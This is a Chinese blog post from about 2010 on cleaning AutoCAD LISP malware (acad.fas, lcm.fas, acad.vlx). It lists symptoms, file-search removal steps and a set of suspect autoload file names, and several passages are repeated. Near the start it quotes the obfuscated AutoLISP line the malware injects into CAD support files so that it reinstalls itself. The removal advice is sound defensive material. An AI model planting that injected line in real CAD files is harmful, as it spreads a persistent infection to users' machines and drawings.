打开图档会自动生成一个acad.vlx的文件 2.CAD目录的acetauto.lsp ai_utils.lsp acad.mnl文件中间被添加 (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))3.Help目录增加logo.gif (acad.vlx文件的副本)版本2 本人无病毒样本,网友提供解决方法.1.破坏性的acad.vlx,打开CAD图纸,发现图纸上只有一句英文:MUST re_cover!以前画的图全没有了.2.运行re_cover就可以恢复被打乱隐藏的图纸3.全盘搜索acad.vlx删除常见问题：01. 新变种未知病毒如何查杀?假设病毒文件名为acad.fas,在黑名单中添加acad.fas名字,选项中选择放至回收站,手动搜索CAD搜索支持目录中的lsp、mnu文件是否感染病毒代码.如感染手动清除。

CAD病毒清除方法kcfy发表于2010-12-07 08:57 最后修改于2011-03-24 20:30 浏览(1930) 评论(0)分类：AutoCAD举报一、“党是不会亏待你的”CAD病毒的清除方法1、该病毒发作后的主要表现为：①、病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框；②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

（原病毒作者如是说。

不过我在CAD2002上没有发现此更象，可能高版本的CAD才会吧。

）2、清除方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）；②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.fas和lcm.fas文件；③、XP文件搜索窗口设置如下：a．搜索acad.fas文件b．搜索lcm.fas文件注意：①、“搜索范围”一定要选择“本机硬盘驱动器 (C:;D:;E:;F:)”；②、一定要先勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

其它CAD病毒，如acaddoc.lsp、acad.lsp等等，都可以用上述方法来搜索删除CAD病毒文件。

二、清除CAD恶意程序“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

清除这类恶意程序可参考以下方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。

常见AutoCAD病毒(acad.fas、acad.lsp)清除方法一、该病毒发作后的主要表现为：①、病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框；②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

（原病毒作者如是说。

不过我在CAD2002上没有发现此更象，可能高版本的CAD才会吧。

）二、清除方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.fas和lcm.fas文件③、XP文件搜索窗口设置如下：a．搜索acad.fas文件b．搜索lcm.fas文件注意：①、“搜索范围”一定要选择“本机硬盘驱动器(C:;D:;E:;F:)”。

②、一定要先勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

一般做到上面几步就能解决问题。

我的问题就是这么解决的。

一：比较全面的清除方法：“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

CAD恶意程序清除工具，支持CAD2002-2010版本。

程序根据“病毒及信任文件”列表搜索、删除CAD恶意程序并清除其加载项。

大家在工作中，打开自己或别人拷贝来的DWG文件前，不要忙着打开CAD，先看看这个DWG图纸目录内，有没有acad.lsp、acad.fas和acad.vlx这些的文件，有就应该立即清除该文件。

这样可以大大减少“CAD恶意程序”传播的机会。

手工清除方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。